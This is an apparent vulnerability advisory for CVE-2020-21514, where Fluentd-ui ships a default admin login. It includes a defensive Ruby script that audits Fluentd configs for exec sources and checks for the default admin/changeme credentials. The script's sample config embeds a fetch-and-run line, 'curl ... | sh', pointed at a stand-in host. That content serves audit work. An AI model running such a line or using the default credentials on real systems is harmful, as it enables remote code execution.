
CVE-2020-21514: Fluent Fluentd and Fluent-ui use default password

CVSS Score: 8.8 (CVSS 3.1)

Basic Information

EPSS Score: 0.26215%
Published: 4/4/2023
Updated: 2/13/2025
KEV Status: No
Technology: Ruby

Technical Details

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Package Name    Ecosystem    Vulnerable Versions    First Patched Version
fluentd         rubygems     <= 1.8.0               (none listed)
fluentd-ui      rubygems     <= 1.2.2               (none listed)

Vulnerability Intelligence

Root Cause Analysis

The vulnerability stems from Fluentd-ui shipping with a default login (user 'admin', password 'changeme') that the application never forces an operator to change after deployment. The advisory does not name specific functions, but the flaw sits in the code that seeds and authenticates that initial account in Fluentd-ui. Because Fluentd-ui manages the Fluentd configuration, an attacker who logs in with the default credentials can drive Fluentd features such as the in_exec plugin (bundled with Fluentd by default), which runs an arbitrary command as the Fluentd process, to achieve code execution. The assigned CWE-276 (Incorrect Default Permissions) is consistent with this analysis: the product ships with insecure default authentication settings. The practical check is therefore twofold: confirm that the admin account no longer accepts the shipped password, and review the live Fluentd configuration for exec sources that nobody provisioned.
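The following Ruby script is an added example (not Miggo's or the Fluentd project's code) showing the two checks described above. It parses a Fluentd-style configuration, reports every top-level `<source>` that uses `@type exec` together with the command it would run, and flags a login pair that matches the shipped default. The configuration it inspects is constructed inline for the example; the parser is a deliberately minimal one that handles nested sections but not `@include` or multiline values, so point it at a real fluent.conf with that limitation in mind.

```ruby
# Added example: audit a Fluentd config for in_exec sources and test for the
# default fluentd-ui credentials. Not part of Fluentd or fluentd-ui.

# Default fluentd-ui login pair named in the advisory.
DEFAULT_CREDENTIALS = [['admin', 'changeme']].freeze

# Constructed sample config (not from any real deployment): one ordinary tail
# source and one exec source of the kind an attacker with UI access could add.
SAMPLE_CONFIG = <<~CONF
  <source>
    @type tail
    path /var/log/app.log
    tag app.log
    <parse>
      @type none
    </parse>
  </source>

  <source>
    @type exec
    command curl -s http://example.invalid/x | sh
    tag attacker.cmd
    run_interval 10s
    <parse>
      @type none
    </parse>
  </source>

  <match **>
    @type stdout
  </match>
CONF

# Returns one hash per top-level <source> section holding its directly nested
# key/value lines. Nested sections such as <parse> are tracked only for depth.
# Simplification: no @include handling, no multiline values.
def parse_sources(config)
  sources = []
  stack = []
  current = nil
  config.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?('#')
    if (m = line.match(%r{\A<(/?)([\w*]+)[^>]*>\z}))
      closing, name = m[1] == '/', m[2]
      if closing
        stack.pop
        if stack.empty? && current
          sources << current
          current = nil
        end
      else
        stack.push(name)
        current = {} if stack.size == 1 && name == 'source'
      end
    elsif current && stack.size == 1
      key, value = line.split(/\s+/, 2)
      current[key] = value.to_s
    end
  end
  sources
end

# The in_exec sources in the config, with the command each would execute.
def exec_sources(config)
  parse_sources(config)
    .select { |s| s['@type'] == 'exec' }
    .map { |s| { command: s['command'], tag: s['tag'] } }
end

# True when the supplied fluentd-ui login pair is the shipped default.
def default_credentials?(user, password)
  DEFAULT_CREDENTIALS.include?([user, password])
end

if __FILE__ == $PROGRAM_NAME
  exec_sources(SAMPLE_CONFIG).each do |s|
    puts "exec source tag=#{s[:tag]} command=#{s[:command]}"
  end
  puts 'fluentd-ui still uses the default credentials' if default_credentials?('admin', 'changeme')
end
```

Run it against a real configuration by replacing SAMPLE_CONFIG with `File.read('/etc/fluent/fluent.conf')`; any exec source that nobody provisioned deserves the same treatment as a scheduled task an attacker left behind, and a successful `default_credentials?` result on the credentials the UI accepts means the account must be rotated before anything else.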


WAF Protection Rules

WAF Rule

An issue was discovered in Fluent Fluentd v1.8.0 and Fluent-ui v1.2.2 that allows attackers to gain escalated privileges and execute arbitrary code due to use of a default password.
